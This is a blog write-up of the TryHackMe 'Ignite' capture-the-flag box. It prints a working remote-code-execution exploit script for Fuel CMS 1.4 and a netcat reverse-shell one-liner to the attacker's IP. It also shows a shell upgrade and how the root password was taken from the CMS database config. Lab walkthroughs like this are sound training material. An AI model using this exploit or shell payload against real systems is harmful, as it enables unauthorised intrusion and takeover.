TryHackMe | Ignite
This is my #2nd blog post in series of blogs. I will be publishing all Boot to Root machines that I solve from various platforms like Hackthebox, Vulnhub, TryHackMe etc.
Ignite is a straight forward box. Running vulnerable CMS, lets attackers to gain initial shell. And then further enumerating more, we get root. Let’s get started.
Reconnaissance
Starting with a simple nmap scan to see which ports are open and what services are running on these ports.
nmap -sC -sV -O -oA simple_scan 10.10.75.216- -sC: run default nmap scripts
- -sV: detect service version
- -O: detect OS
- -oA: output all formats and store in file named simple_scan
Going back to the results, only 1 open port i.e port 80 and Fuel CMS is installed.
Enumeration
Open the url in browser.
http://10.10.75.216/
Let’s check Fuel CMS version 1.4 have any public exploits available.
Bingo. FuelCMS Version 1.4 having remote code execution. Download the code and save it.
import requests
import urllib
url = "http://127.0.0.1:8881"
def find_nth_overlapping(haystack, needle, n):
start = haystack.find(needle)
while start >= 0 and n > 1:
start = haystack.find(needle, start+1)
n -= 1
return start
while 1:
xxxx = raw_input('cmd:')
burp0_url = url+"/fuel/pages/select/?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27"+urllib.quote(xxxx)+"%27%29%2b%27"
proxy = {"http":"http://127.0.0.1:8080"}
r = requests.get(burp0_url, proxies=proxy)
html = "<!DOCTYPE html>"
htmlcharset = r.text.find(html)
begin = r.text[0:20]
dup = find_nth_overlapping(r.text,begin,2)
print r.text[0:dup]The exploit code seems to be a bit complicated to me because In order to run and get results successfully, we need to set up a proxy. So I decided to tweak the code a bit to make it easy setup without setting up proxy and save it.
import requests
import urllib
url = "http://10.10.75.216"
def find_nth_overlapping(haystack, needle, n):
start = haystack.find(needle)
while start >= 0 and n > 1:
start = haystack.find(needle, start+1)
n -= 1
return start
while 1:
xxxx = raw_input('cmd:')
burp0_url = url+"/fuel/pages/select/?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27"+urllib.quote(xxxx
)+"%27%29%2b%27"
r = requests.get(burp0_url)
html = "<!DOCTYPE html>"
htmlcharset = r.text.find(html)
begin = r.text[0:20]
dup = find_nth_overlapping(r.text,begin,2)
print r.text[0:dup]Before running the exploit, let’s set up our netcat listener on port 7896.
nc -lvp 7896
Now run the exploit in different tab and enter the following command to get a reverse shell.
rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 10.8.13.70 7896 > /tmp/f
On executing the payload, we got a reverse shell on netcat listener we setup earlier.
Upgrade the obtained shell to bash using the following command.
python -c 'import pty; pty.spawn("/bin/bash")'
We have successfully upgraded our shell to bash. Now let’s explore the machine. In the www-data directory, we have found flag.txt.
With this half of the challenge is completed. But the main objective is to obtain root access and root.txt file. So let’s dig deeper.
Privilege Escalation
I ran a couple of enumeration scripts but got nothing interesting. So I started looking around for background processes, but again found nothing.
After looking around for a little bit, I found this. If you remember in the starting of our enumeration phase, the default page on port 80 is having installation guide which contains path’s of database file.
Let’s navigate to those path’s and see, if they are having any juicy information that can give us the root access.
cd /var/www/html/fuel/application/configcat /var/www/html/fuel/application/config/database.php
Bingo, we have obtained root password from ‘database.php’ file. Now login with the found credentials with the following command.
su root
Now we have successfully obtained root, In order to completed this challenge we have to submit content of root.txt. The content of the flag can be obtained by following commad.
cat /root/root.txt
We have completed Ignite for TryHackMe. Thank you staying till the end, feedback is always appreciated.
